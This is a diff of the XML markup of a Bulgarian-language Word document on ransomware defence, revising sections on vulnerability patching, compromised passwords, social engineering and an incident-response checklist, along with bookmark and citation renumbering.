       </w:pPr>
-      <w:bookmarkStart w:id="25" w:name="_Toc223545537"/>
+      <w:bookmarkStart w:id="26" w:name="_Toc223896495"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Превенция </w:t>
@@ -9525,7 +9570,7 @@
       <w:r>
         <w:t>уязвимости</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="25"/>
+      <w:bookmarkEnd w:id="26"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -9638,76 +9683,117 @@
         <w:t xml:space="preserve">. </w:t>
       </w:r>
       <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Особено сканове </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>на</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> тези устройства, които са свързани към интернета, за да се ограничи атаката.</w:t>
-      </w:r>
-      <w:r>
+        <w:t>Задължително е да се извършват редовни сканирания за уязвимости, като приоритет трябва да получат устройствата с директна връзка към интернет.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="360"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Чести ъпдейти и пачове на софтуера и операционната система към последните налични версии е </w:t>
+      </w:r>
+      <w:r>
+        <w:t>ключово</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. Трябва да се приоритизира ъпдейти на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>OS</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> свързани с </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>процесването</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> на интернет данни – уеб </w:t>
+      </w:r>
+      <w:r>
+        <w:t>браузери</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> и плъгини. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Малкият и средният бизнес често имат проблем с поддържка</w:t>
+      </w:r>
+      <w:r>
+        <w:t>та</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> на актуализациите, поради липсва на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">security </w:t>
+      </w:r>
+      <w:r>
+        <w:t>и</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="360"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Чести ъпдейти и пачове на софтуера и операционната система към последните налични версии е </w:t>
-      </w:r>
-      <w:r>
-        <w:t>ключово</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">. Трябва да се приоритизира ъпдейти на </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>OS</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> свързани с процесването на интернет данни – уеб </w:t>
-      </w:r>
-      <w:r>
-        <w:t>браузери</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> и плъгини. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Малкият и средният бизнес често имат проблем с поддържка</w:t>
-      </w:r>
-      <w:r>
-        <w:t>та</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> на актуализациите, поради липсва на </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">security </w:t>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>maintenance</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>отдел</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Едно решение е да се премине към </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>managed cloud providers</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, за да не се налага поддръжка на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>exchange server</w:t>
+      </w:r>
+      <w:r>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> identity server </w:t>
       </w:r>
       <w:r>
         <w:t>и</w:t>
@@ -9716,69 +9802,18 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
+        <w:t xml:space="preserve"> mail gateway.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>maintenance</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>отдел</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Едно решение е да се премине към </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>managed cloud providers</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">, за да не се налага поддръжка на </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>exchange server</w:t>
-      </w:r>
-      <w:r>
-        <w:t>,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> identity server </w:t>
-      </w:r>
-      <w:r>
-        <w:t>и</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> mail gateway.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
         <w:t>C</w:t>
       </w:r>
       <w:r>
@@ -9794,7 +9829,15 @@
         <w:t xml:space="preserve"> и</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> за уязвимости, пачва системи и има защити против </w:t>
+        <w:t xml:space="preserve"> за уязвимости, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>пачва</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> системи и има защити против </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9930,9 +9973,9 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F2EDD25" wp14:editId="03E6AB96">
-            <wp:extent cx="4660900" cy="1846481"/>
-            <wp:effectExtent l="0" t="0" r="6350" b="1905"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F2EDD25" wp14:editId="657B8091">
+            <wp:extent cx="4513859" cy="1788228"/>
+            <wp:effectExtent l="0" t="0" r="1270" b="2540"/>
             <wp:docPr id="125626481" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -9953,7 +9996,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4688513" cy="1857420"/>
+                      <a:ext cx="4546035" cy="1800975"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -9971,7 +10014,7 @@
         <w:pStyle w:val="Caption"/>
         <w:jc w:val="left"/>
       </w:pPr>
-      <w:bookmarkStart w:id="26" w:name="_Toc223382615"/>
+      <w:bookmarkStart w:id="27" w:name="_Toc223382615"/>
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
@@ -10045,65 +10088,37 @@
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve"> на internet-facing vulnerabilities. </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>на</w:t>
+        <w:t>Експлоатация</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> internet-facing vulnerabilities. </w:t>
+        <w:t xml:space="preserve"> на </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>Експлоатация</w:t>
+        <w:t>услуги</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>на</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>услуги</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
         <w:t>.</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="26"/>
+      <w:bookmarkEnd w:id="27"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -10157,7 +10172,7 @@
         <w:pStyle w:val="Caption"/>
         <w:jc w:val="left"/>
       </w:pPr>
-      <w:bookmarkStart w:id="27" w:name="_Toc223382616"/>
+      <w:bookmarkStart w:id="28" w:name="_Toc223382616"/>
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
@@ -10207,7 +10222,7 @@
       <w:r>
         <w:t>.</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="27"/>
+      <w:bookmarkEnd w:id="28"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -10221,7 +10236,7 @@
           <w:szCs w:val="20"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="28" w:name="_Toc223545538"/>
+      <w:bookmarkStart w:id="29" w:name="_Toc223896496"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Компрометирани </w:t>
@@ -10229,7 +10244,7 @@
       <w:r>
         <w:t>пароли</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="28"/>
+      <w:bookmarkEnd w:id="29"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -10575,13 +10590,8 @@
       <w:pPr>
         <w:ind w:firstLine="360"/>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Токени</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> и други</w:t>
+      <w:r>
+        <w:t>Токени и други</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10797,7 +10807,7 @@
           <w:szCs w:val="20"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="29" w:name="_Toc223382617"/>
+      <w:bookmarkStart w:id="30" w:name="_Toc223382617"/>
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
@@ -10828,7 +10838,7 @@
       <w:r>
         <w:t>Диаграма защо използването на пароли по подразбиране не е препоръчително.</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="29"/>
+      <w:bookmarkEnd w:id="30"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -10844,7 +10854,7 @@
       <w:r>
         <w:br w:type="page"/>
       </w:r>
-      <w:bookmarkStart w:id="30" w:name="_Toc223545539"/>
+      <w:bookmarkStart w:id="31" w:name="_Toc223896497"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -10855,7 +10865,7 @@
       <w:r>
         <w:t>атаки</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="30"/>
+      <w:bookmarkEnd w:id="31"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -11038,7 +11048,7 @@
             <w:rPr>
               <w:noProof/>
             </w:rPr>
-            <w:t>[11]</w:t>
+            <w:t>[14]</w:t>
           </w:r>
           <w:r>
             <w:fldChar w:fldCharType="end"/>
@@ -11100,7 +11110,7 @@
           <w:szCs w:val="20"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="31" w:name="_Toc223382618"/>
+      <w:bookmarkStart w:id="32" w:name="_Toc223382618"/>
       <w:r>
         <w:t xml:space="preserve">Фигура </w:t>
       </w:r>
@@ -11139,7 +11149,7 @@
       <w:r>
         <w:t xml:space="preserve"> фишинг имейл в Outlook.</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="31"/>
+      <w:bookmarkEnd w:id="32"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -11152,7 +11162,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="32" w:name="_Toc223545540"/>
+      <w:bookmarkStart w:id="33" w:name="_Toc223896498"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Други форми на </w:t>
@@ -11163,7 +11173,7 @@
         </w:rPr>
         <w:t>Social Engineering</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="32"/>
+      <w:bookmarkEnd w:id="33"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -11360,7 +11370,7 @@
             <w:rPr>
               <w:noProof/>
             </w:rPr>
-            <w:t>[11]</w:t>
+            <w:t>[14]</w:t>
           </w:r>
           <w:r>
             <w:fldChar w:fldCharType="end"/>
@@ -11380,7 +11390,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="33" w:name="_Toc223545541"/>
+      <w:bookmarkStart w:id="34" w:name="_Toc223896499"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Какво да направим, ако станем жертва на</w:t>
@@ -11397,12 +11407,30 @@
       <w:r>
         <w:t>?</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="33"/>
+      <w:bookmarkEnd w:id="34"/>
     </w:p>
     <w:p>
       <w:r>
         <w:tab/>
-        <w:t>Най-важното е да се уведомят всички участниците в дадена мрежа. Независимо дали са част от организация или в домашна среда. В случай, че засегнатият е част от организация веднага да се вдигне ескалация на по-висока инстанция. Оттам ще се включат и съответните екипи. Много е важно да се уведомят и всички засегнати клиенти.</w:t>
+        <w:t>Най-важното е да се уведомят всички участниците в дадена мрежа. Независимо дали са част от организация или в домашна среда. В случай, че засегнатият е част от организация</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>незабавно да се уведоми ръководството или отговорният екип</w:t>
+      </w:r>
+      <w:r>
+        <w:t>. Много е важно да се уведомят всички засегнати клиенти</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> и </w:t>
+      </w:r>
+      <w:r>
+        <w:t>съответните власти</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11417,6 +11445,7 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="10"/>
         </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">Веднага да се определят засегнатите системи  и да се изолират. Ако множество системи и/или </w:t>
@@ -11444,6 +11473,7 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="10"/>
         </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">Друг вариант, ако не може да се изключат от мрежата е да се извади мрежовия кабел </w:t>
@@ -11474,6 +11504,7 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="10"/>
         </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">За ресурси намиращи се в </w:t>
@@ -11504,6 +11535,7 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="10"/>
         </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
         <w:t>След първоначалната атака киберпрестъпниците могат да имат достъп до вътрешните комуникации и да реагират на всяко едно предприето действие. За това комуникацията трябва да се извършва извънмрежово (</w:t>
@@ -11525,18 +11557,13 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="10"/>
         </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Изключване на устройствата, ако по никакъв начин не могат да се изолират. Това вероятно ще унищожи и доказателства, понеже част от доказателствата се съхраняват и в </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">RAM </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">паметта. Да се прилага само в крайни случаи. </w:t>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Смяна на всички идентификационни данни</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, задължително на пострадалите.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11546,9 +11573,13 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="10"/>
         </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Ако има системите, които не са засегнати, да се отделят.</w:t>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Преди опит за възстановяване, първо да се направи пълни копия на засегнатите системи. Ще послужи в по-нататъшното разследване.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Ако ще се възстановява от тях е важно да се направи проверка дали и те не са афектирани.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11558,26 +11589,19 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="10"/>
         </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Прегледайте всички възможни системни, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>EDR, IDS, IPS</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>логове</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>.</w:t>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Изключване на устройствата, ако по никакъв начин не могат да се изолират. Това вероятно ще унищожи и доказателства, понеже част от доказателствата се съхраняват и в </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">RAM </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">паметта. Да се прилага само в крайни случаи. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11587,32 +11611,10 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="10"/>
         </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Ransomware</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> е само финалната част, трябва да се прегледат по-ранни </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>компроментации</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">. Много е вероятно да има други </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>dropper</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> злонамерени софтуери. Трябва да бъдат отстранени преди възстановяване на системата.</w:t>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Ако има системите, които не са засегнати, да се отделят.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11622,18 +11624,27 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="10"/>
         </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Всякакви новосъздадени акаунти, ескалирани привилегии или много често </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>.exe</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> файлове трябва да бъдат отстранени.</w:t>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Прегледайте всички възможни системни, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>EDR, IDS, IPS</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>логове</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11643,35 +11654,33 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="10"/>
         </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Да се наблюдава изпълнението на </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>PowerShell</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> команди, използването на </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>RMM</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> софтуер, неочаквани комуникации по мрежата и извличане на </w:t>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Ransomware</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> е само финалната част, трябва да се прегледат по-ранни </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>креденшъли</w:t>
+        <w:t>компроментации</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>.</w:t>
+        <w:t xml:space="preserve">. Много е вероятно да има други </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>dropper</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> злонамерени софтуери. Трябва да бъдат отстранени преди възстановяване на системата.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11681,9 +11690,20 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="10"/>
         </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Ако има неочаквано голям изходящ трафик, най-вероятно се извличат незаконно данни.</w:t>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Всякакви новосъздадени акаунти, ескалирани привилегии или много често </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.exe</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> файлове трябва да бъдат отстранени.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11693,6 +11713,60 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="10"/>
         </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Да се наблюдава изпълнението на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>PowerShell</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> команди, използването на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>RMM</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> софтуер, неочаквани комуникации по мрежата и извличане на</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>идентификационни данни</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Ако има неочаквано голям изходящ трафик, най-вероятно се извличат незаконно данни.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">За облачна инфраструктура да се провери дали на </w:t>
@@ -11742,7 +11816,7 @@
         <w:br w:type="page"/>
       </w:r>
     </w:p>
-    <w:bookmarkStart w:id="34" w:name="_Toc223545542" w:displacedByCustomXml="next"/>
+    <w:bookmarkStart w:id="35" w:name="_Toc223896500" w:displacedByCustomXml="next"/>
     <w:sdt>
       <w:sdtPr>
         <w:rPr>
@@ -11770,7 +11844,7 @@
           <w:r>
             <w:t>Цитирани източници</w:t>
           </w:r>
-          <w:bookmarkEnd w:id="34"/>
+          <w:bookmarkEnd w:id="35"/>
         </w:p>
         <w:p>
           <w:pPr>
@@ -11807,7 +11881,7 @@
           </w:tblGrid>
           <w:tr>
             <w:trPr>
-              <w:divId w:val="724986744"/>
+              <w:divId w:val="213932172"/>
               <w:tblCellSpacing w:w="15" w:type="dxa"/>
             </w:trPr>
             <w:tc>
@@ -11855,7 +11929,7 @@
           </w:tr>
           <w:tr>
             <w:trPr>
-              <w:divId w:val="724986744"/>
+              <w:divId w:val="213932172"/>
               <w:tblCellSpacing w:w="15" w:type="dxa"/>
             </w:trPr>
             <w:tc>
@@ -11901,7 +11975,7 @@
           </w:tr>
           <w:tr>
             <w:trPr>
-              <w:divId w:val="724986744"/>
+              <w:divId w:val="213932172"/>
               <w:tblCellSpacing w:w="15" w:type="dxa"/>
             </w:trPr>
             <w:tc>
@@ -11947,7 +12021,7 @@
           </w:tr>
           <w:tr>
             <w:trPr>
-              <w:divId w:val="724986744"/>
+              <w:divId w:val="213932172"/>
               <w:tblCellSpacing w:w="15" w:type="dxa"/>
             </w:trPr>
             <w:tc>
@@ -11993,7 +12067,7 @@
           </w:tr>
           <w:tr>
             <w:trPr>
-              <w:divId w:val="724986744"/>
+              <w:divId w:val="213932172"/>
               <w:tblCellSpacing w:w="15" w:type="dxa"/>
             </w:trPr>
             <w:tc>
@@ -12039,7 +12113,7 @@
           </w:tr>
           <w:tr>
             <w:trPr>
-              <w:divId w:val="724986744"/>
+              <w:divId w:val="213932172"/>
               <w:tblCellSpacing w:w="15" w:type="dxa"/>
             </w:trPr>
             <w:tc>
@@ -12085,7 +12159,7 @@
           </w:tr>
           <w:tr>
             <w:trPr>
-              <w:divId w:val="724986744"/>
+              <w:divId w:val="213932172"/>
               <w:tblCellSpacing w:w="15" w:type="dxa"/>
             </w:trPr>
             <w:tc>
@@ -12131,7 +12205,7 @@
           </w:tr>
           <w:tr>
             <w:trPr>
-              <w:divId w:val="724986744"/>
+              <w:divId w:val="213932172"/>
